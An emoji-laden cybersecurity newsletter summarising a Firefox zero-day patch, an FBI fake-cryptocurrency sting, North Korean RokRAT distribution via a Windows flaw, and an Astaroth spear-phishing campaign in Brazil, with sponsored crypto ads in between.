Welcome to Gone Phishing, your daily cybersecurity newsletter that’s sending our love down the phishing well ❤️🎣💀 All the way down!! 🐝 

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

Congrats to Mozilla, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

All Mozilla, no filler 🤘

🚨 Critical Firefox Flaw Under Active Attack – Update Now! ⚠️

Mozilla has patched a critical security vulnerability, CVE-2024-9680 (CVSS 9.8), impacting Firefox and Firefox ESR, which is being actively exploited in the wild! ⚠️ This use-after-free bug in the Animation timeline allows attackers to achieve remote code execution. 🚨💻 

Discovered by ESET’s Damien Schaeffer, the flaw is fixed in Firefox 131.0.2 and ESR versions 128.3.1 and 115.16.1. While details on real-world attacks are sparse, this could be used in watering hole or drive-by download campaigns. 🌐🔒

Even the Tor Browser has issued an emergency update to protect users from this threat (version 13.5.7). Mozilla shipped the fix within 25 hours of disclosure! 🔧💥 Update now to stay safe from these active exploits! 🛡️🔥 

Now, on to this week’s hottest cybersecurity news stories: 

• 🕵🏻 FBI creates fake cryptocurrency to expose crypto corruption 👨🏻‍💻

• 🚀 N. Korean ScarCrufts spreads RokRAT via Windows zero-day 🐀

• 🎣 Brazil spear–phished by resurfaced Astaroth banking malware 💸

FBI, Robot… 🤖

🚨 FBI Creates Fake Cryptocurrency to Unmask Crypto Market Manipulation! 💰

💥 Crypto scammers, watch out! In a bold move, the FBI has taken down a widespread crypto fraud operation by creating a fake cryptocurrency, NexFundAI, to expose shady market manipulation. 🕵️‍♂️

🛠️ How It Worked

As part of Operation Token Mirrors, the FBI launched NexFundAI, a fake crypto token marketed as a bridge between finance and artificial intelligence. However, it was secretly a sting operation designed to uncover illegal trading activities like wash trading and pump-and-dump schemes. 🎣

🔍 Wash Trading Explained

In this scam, companies involved in the operation made fake trades with their own tokens to artificially inflate prices. This created a false sense of value, tricking investors into buying in, only for the fraudsters to sell at a profit, leaving everyone else in the dust. 💥💸

🛑 Who Got Caught?

The crackdown has led to charges against 18 individuals and entities, including market makers like ZM Quant and CLS Global, who conspired to manipulate prices. So far, $25 million in cryptocurrency has been seized, and several key players arrested in the U.S., U.K., and Portugal.

💼 What’s the Damage?

Fraudulent companies exploited investors by promising big returns, but it was all smoke and mirrors. Pump-and-dump scams flooded the market with fake value, leaving unsuspecting buyers with worthless assets.

⚠️ Stay Alert!

As the crypto market continues to grow, so do scams. Remember: not all that glitters is Bitcoin! Protect yourself from market manipulation by staying informed and cautious. 🚨

VaultCraft launches V2, TVL skyrockets above $100M

VaultCraft launches V2, partners with Safe, and secures $100M+ in Bitcoin

• Matrixport, Asia’s leading crypto providers, commits $100M+ in Bitcoin

• OKX Web3 to launch Safe Smart Vaults with $250K+ in rewards

Earn Now

N. Korean Scarts and Crufts 🎨 

🚨 North Korean Hackers Exploit Windows Flaw to Spread RokRAT Malware! 🖥️💥

🔓 ScarCruft Strikes Again! The North Korean threat group ScarCruft (aka TA-RedAnt) has been caught exploiting a zero-day flaw in Windows, using it to spread the dangerous RokRAT malware. 🚨

🛠️ The Vulnerability

The bug, known as CVE-2024-38178, is a memory corruption flaw in Windows' Scripting Engine with a CVSS score of 7.5. The vulnerability allows for remote code execution when users open a malicious link in Edge's Internet Explorer mode. It was patched in August 2024, but attackers were quick to exploit it before the update.

📩 Operation Code on Toast

The attack, dubbed Operation Code on Toast by South Korean cybersecurity researchers, targeted toast ads (pop-up notifications) bundled with free software in Korea. Threat actors compromised an ad server and injected malicious code into the ad content to infect users. 🔥

🦠 RokRAT Malware in Action

Once the vulnerable toast program downloaded the infected ad, users were hit with RokRAT. This malware can spy on your files, control your processes, and steal data from apps like KakaoTalk, WeChat, and web browsers. What makes it even sneakier? It uses trusted cloud services like Dropbox and Google Cloud to communicate with its command-and-control server, blending in with regular traffic. 🌩️

🔐 Stay Safe!

ScarCruft has a history of exploiting Internet Explorer flaws. To protect yourself, always keep your system and software up to date, especially if you're using any legacy programs. Hackers are always evolving—don’t let your system become their next target! 🎯

VaultCraft launches V2, Skyrockets to $100M+ TVL

VaultCraft debuts new Safe-secured platform, wins $100M+ Bitcoin commitment

• Leading crypto platform Matrixport chooses VaultCraft for $100M Bitcoin

• Launching 7 new yield vaults on OKX Web3 with $250K+ in rewards

Start Earning

It’s the AstaRothstein of banking malware 🧔🏻 

🚨 New Spear-Phishing Campaign Targets Brazil w/ Astaroth Banking Malware 💰💻

🛑 Brazil Under Attack! A spear-phishing campaign targeting various industries in Brazil is spreading the notorious Astaroth banking malware (also known as Guildma) through obfuscated JavaScript to evade security defences. 🦠

💼 Targeting Businesses and Government

The attack, dubbed Water Makara by Trend Micro, has been aimed at manufacturing companies, retail firms, and government agencies, using fake tax document emails to trick victims. Posing as official messages from Receita Federal, the emails urge recipients to download malware disguised as personal income tax files. 📑

💣 How It Works

The phishing emails deliver a ZIP file containing a malicious Windows shortcut (LNK), which exploits the legitimate mshta.exe utility to run obfuscated JavaScript. This sneaky script connects to a command-and-control (C2) server, where the real damage begins—infecting devices with the evolving Astaroth malware. 🔗

🏦 Astaroth Banking Trojan

Though Astaroth has been around for a while, it’s still evolving and continues to be a serious threat. Once on your system, the malware steals sensitive banking data, leading to financial losses and long-term damage to consumer trust. It also causes business disruptions, from downtime to recovery costs, making it a major headache for affected companies. 😨

🚫 Don't let your business fall victim to Water Makara! Stay vigilant and cautious with any unsolicited emails, especially those that seem urgent or too official. 💼

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

• 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

• 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

• 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!